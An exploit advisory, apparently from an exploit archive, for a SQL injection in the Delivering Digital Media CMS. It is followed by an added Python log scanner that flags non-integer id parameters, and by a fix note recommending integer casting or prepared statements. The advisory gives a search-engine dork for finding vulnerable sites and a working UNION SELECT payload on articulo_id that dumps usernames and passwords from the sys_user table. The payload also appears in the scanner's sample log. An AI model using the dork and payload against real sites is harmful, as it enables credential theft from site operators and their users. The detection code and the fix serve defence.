# Title: Delivering Digital Media CMS SQL Injection Vulnerability
# EDB-ID:
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Dr.0rYX and Cr3w-DZ
# Published:
# Verified:

N.A.S.T ALGERIAN HACKER
**********************- NORTH-AFRICA SECURITY TEAM -***********************
[!] Delivering Digital Media CMS SQL Injection Vulnerability
[!] Author: Dr.0rYX and Cr3w-DZ
[!] MAIL: vx3@hotmail.de & Cr3w@hotmail.de
***************************************************************************/

[ Software Information ]

[+] Vendor : http://www.delivering.info
[+] script : Delivering Digital Media CMS
[+] Download : http://www.delivering.info/contacto/delivering-argentina.php (sell script)
[+] Vulnerability : php SQL injection
[+] Dork : inurl:"index.php?edicion_id="
**************************************************************************/

[ Vulnerable File ]

http://server/[PATH]/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=[N.A.S.T ]
http://server/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=[N.A.S.T ]

[ Exploit ]

http://server/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat(user_id,0x3a,username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user--

[GReets ]

[+] :claw ,harD , exploit-db.com , ALL HACKERS MUSLIMS

EXAMPLE:
http://[site]/sitio/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat%28user_id,0x3a,username,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user--
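
A log check for the request pattern shown above, added here as an example and not part of the original advisory: it flags any request whose `edicion_id`, `categoria_id`, `origen_id` or `articulo_id` value is not a plain integer after URL decoding. It assumes a combined-format web access log and that these parameters are only ever meant to carry integers; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Numeric id parameters named in the advisory's vulnerable URL.
ID_PARAMS = ("edicion_id", "categoria_id", "origen_id", "articulo_id")
# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
DIGITS_RE = re.compile(r"[0-9]{1,10}")  # ASCII digits only, bounded length


def suspicious_params(request_target):
    """Return {param: decoded value} for id parameters that are not plain integers."""
    query = urlsplit(request_target).query
    # parse_qs percent-decodes and maps '+' to a space, so %28-style and
    # '+'-separated variants of the same payload normalise to one form.
    values = parse_qs(query, keep_blank_values=True)
    bad = {}
    for name in ID_PARAMS:
        for value in values.get(name, []):
            if not DIGITS_RE.fullmatch(value):
                bad[name] = value
    return bad


def scan(log_lines):
    """Yield (line_number, findings) for each log line with a non-integer id parameter."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = suspicious_params(match.group(1))
        if findings:
            yield number, findings


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=42 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Jan/2010:10:00:05 +0000] "GET /index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3+from+sys_user-- HTTP/1.1" 200 7311',
    '192.0.2.77 - - [01/Jan/2010:10:00:09 +0000] "GET /sitio/index.php?edicion_id=1%27&categoria_id=1&origen_id=1&articulo_id=7 HTTP/1.1" 500 312',
    '192.0.2.10 - - [01/Jan/2010:10:00:12 +0000] "GET /css/site.css HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

The same allow-list (digits only) is the server-side fix as well: casting these parameters to integers or binding them in a prepared statement before they reach the query removes the injection point.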